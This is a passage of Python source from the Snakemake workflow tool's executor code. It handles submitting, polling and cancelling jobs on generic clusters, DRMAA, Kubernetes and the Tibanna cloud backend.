self.sidecarcmd, stdout=subprocess.PIPE, shell=False, encoding="utf-8"
)
self.sidecar_vars = process.stdout.readline()
while self.sidecar_vars and self.sidecar_vars[-1] in "\n\r":
self.sidecar_vars = self.sidecar_vars[:-1]
logger.info("Done reading first output line.")
thread_stdout = threading.Thread(
target=copy_stdout, name="sidecar_stdout", args=(self, process)
)
thread_stdout.start()
thread_wait = threading.Thread(
target=wait, name="sidecar_stdout", args=(self, process)
)
thread_wait.start()
def cancel(self):
def _chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i : i + n]
if self.cancelcmd: # We have --cluster-cancel
# Enumerate job IDs and create chunks. If cancelnargs evaluates to false (0/None)
# then pass all job ids at once
jobids = list(self.all_ext_jobids)
chunks = list(_chunks(jobids, self.cancelnargs or len(jobids)))
# Go through the chunks and cancel the jobs, warn in case of failures.
failures = 0
for chunk in chunks:
try:
cancel_timeout = 2 # rather fail on timeout than miss canceling all
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
subprocess.check_call(
[self.cancelcmd] + chunk,
shell=False,
timeout=cancel_timeout,
env=env,
)
except subprocess.SubprocessError:
failures += 1
if failures:
logger.info(
(
"{} out of {} calls to --cluster-cancel failed. This is safe to "
"ignore in most cases."
).format(failures, len(chunks))
)
else:
logger.info(
"No --cluster-cancel given. Will exit after finishing currently running jobs."
)
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
jobfinished = self.get_jobfinished_marker(job)
jobfailed = self.get_jobfailed_marker(job)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
# Remove SNAKEMAKE_PROFILE from environment as the snakemake call inside
# of the cluster job must run locally (or complains about missing -j).
env.pop("SNAKEMAKE_PROFILE", None)
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
env=env,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
status_cmd_kills = []
if self.statuscmd is not None:
def job_status(job, valid_returns=["running", "success", "failed"]):
try:
# this command shall return "success", "failed" or "running"
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
ret = subprocess.check_output(
"{statuscmd} '{jobid}'".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
env=env,
).decode()
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the main process.
status_cmd_kills.append(-e.returncode)
if len(status_cmd_kills) > 10:
logger.info(
"Cluster status command {} was killed >10 times with signal(s) {} "
"(if this happens unexpectedly during your workflow execution, "
"have a closer look.).".format(
self.statuscmd, ",".join(status_cmd_kills)
)
)
status_cmd_kills.clear()
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
ret = ret.strip().split("\n")
if len(ret) != 1 or ret[0] not in valid_returns:
raise WorkflowError(
"Cluster status command {} returned {} but just a single line with one of {} is expected.".format(
self.statuscmd, "\\n".join(ret), ",".join(valid_returns)
)
)
return ret[0]
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
# logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
keepincomplete=keepincomplete,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def get_job_exec_prefix(self, job):
if self.assume_shared_fs:
return f"cd {self.workflow.workdir_init}"
else:
return ""
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def get_job_exec_prefix(self, job):
if self.assume_shared_fs:
return f"cd {self.workflow.workdir_init}"
else:
return ""
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
suspended_msg = set()
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.jobStatus(active_job.jobid)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
if retval == drmaa.JobState.DONE:
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
elif retval == drmaa.JobState.FAILED:
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
# still running
still_running.append(active_job)
def handle_suspended(by):
if active_job.job.jobid not in suspended_msg:
logger.warning(
"Job {} (DRMAA id: {}) was suspended by {}.".format(
active_job.job.jobid, active_job.jobid, by
)
)
suspended_msg.add(active_job.job.jobid)
if retval == drmaa.JobState.USER_SUSPENDED:
handle_suspended("user")
elif retval == drmaa.JobState.SYSTEM_SUSPENDED:
handle_suspended("system")
else:
try:
suspended_msg.remove(active_job.job.jobid)
except KeyError:
# there was nothing to remove
pass
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
"""Change working directory in execution context if provided."""
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
):
self.workflow = workflow
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
assume_shared_fs=False,
max_status_checks_per_second=10,
disable_envvar_declarations=True,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Kubernetes jobs.")
def get_job_exec_prefix(self, job):
return "cp -rf /source/. ."
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
# The kubernetes API can't create secret files larger than 1MB.
source_file_size = os.path.getsize(f)
max_file_size = 1048576
if source_file_size > max_file_size:
logger.warning(
"Skipping the source file {f}. Its size {source_file_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f, source_file_size=source_file_size
)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
# Some files are smaller than 1MB, but grows larger after being base64 encoded
# We should exclude them as well, otherwise Kubernetes APIs will complain
encoded_contents = base64.b64encode(content.read()).decode()
encoded_size = len(encoded_contents)
if encoded_size > 1048576:
logger.warning(
"Skipping the source file {f} for secret key {key}. "
"Its base64 encoded size {encoded_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f,
source_file_size=source_file_size,
key=key,
encoded_size=encoded_size,
)
)
continue
self.secret_files[key] = f
secret.data[key] = encoded_contents
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
# Test if the total size of the configMap exceeds 1MB
config_map_size = sum(
[len(base64.b64decode(v)) for k, v in secret.data.items()]
)
if config_map_size > 1048576:
logger.warning(
"The total size of the included files and other Kubernetes secrets "
"is {}, exceeding the 1MB limit.\n".format(config_map_size)
)
logger.warning(
"The following are the largest files. Consider removing some of them "
"(you need remove at least {} bytes):".format(config_map_size - 1048576)
)
entry_sizes = {
self.secret_files[k]: len(base64.b64decode(v))
for k, v in secret.data.items()
if k in self.secret_files
}
for k, v in sorted(entry_sizes.items(), key=lambda item: item[1])[:-6:-1]:
logger.warning(" * File: {k}, original size: {v}".format(k=k, v=v))
raise WorkflowError("ConfigMap too large")
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
safe_delete_secret = lambda: self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
self._kubernetes_retry(safe_delete_secret)
# In rare cases, deleting a pod may rais 404 NotFound error.
def safe_delete_pod(self, jobid, ignore_not_found=True):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
try:
self.kubeapi.delete_namespaced_pod(jobid, self.namespace, body=body)
except kubernetes.client.rest.ApiException as e:
if e.status == 404 and ignore_not_found:
# Can't find the pod. Maybe it's already been
# destroyed. Proceed with a warning message.
logger.warning(
"[WARNING] 404 not found when trying to delete the pod: {jobid}\n"
"[WARNING] Ignore this error\n".format(jobid=jobid)
)
else:
raise e
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
func = lambda: self.safe_delete_pod(j.jobid, ignore_not_found=True)
self._kubernetes_retry(func)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job_exec(job)
# Kubernetes silently does not submit a job if the name is too long
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir")
]
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="source", mount_path="/source")
]
node_selector = {}
if "machine_type" in job.resources.keys():
# Kubernetes labels a node by its instance type using this node_label.
node_selector["node.kubernetes.io/instance-type"] = job.resources[
"machine_type"
]
body.spec = kubernetes.client.V1PodSpec(
containers=[container], node_selector=node_selector
)
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
# Running in priviledged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
# Sometimes, certain k8s requests throw kubernetes.client.rest.ApiException
# Solving this issue requires reauthentication, as _kubernetes_retry shows
# However, reauthentication itself, under rare conditions, may also throw
# errors such as:
# kubernetes.client.exceptions.ApiException: (409), Reason: Conflict
#
# This error doesn't mean anything wrong with the k8s cluster, and users can safely
# ignore it.
def _reauthenticate_and_retry(self, func=None):
import kubernetes
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("Trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
try:
self.register_secret()
except kubernetes.client.rest.ApiException as e:
if e.status == 409 and e.reason == "Conflict":
logger.warning("409 conflict ApiException when registering secrets")
logger.warning(e)
else:
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
if func:
return func()
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
return self._reauthenticate_and_retry(func)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
logger.info(
"Request time out! "
"check your connection to Kubernetes master"
"Workflow will pause for 5 minutes to allow any update operations to complete"
)
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8 cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
func = lambda: self.safe_delete_pod(
j.jobid, ignore_not_found=True
)
self._kubernetes_retry(func)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
):
self.workflow = workflow
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.main_snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
local_input=local_input,
restart_times=restart_times,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_default_resources_args=True,
disable_envvar_declarations=True,
)
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Tibanna jobs.")
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def get_job_targets(self, job):
def handle_target(target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
return [handle_target(target) for target in job.get_targets()]
def get_snakefile(self):
return os.path.basename(self.snakefile)
def add_command(self, job, tibanna_args, tibanna_config):
# format command
command = self.format_job_exec(job)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
# Local snakemake command here must be run with --default-remote-prefix
# and --default-remote-provider (forced) but on VM these options will be removed.
# The snakemake on the VM will consider these input and output as not remote.
# They files are transferred to the container by Tibanna before running snakemake.
# In short, the paths on VM must be consistent with what's in Snakefile.
# but the actual location of the files is on the S3 bucket/prefix.
# This mapping info must be passed to Tibanna.
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
open_browser=False,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
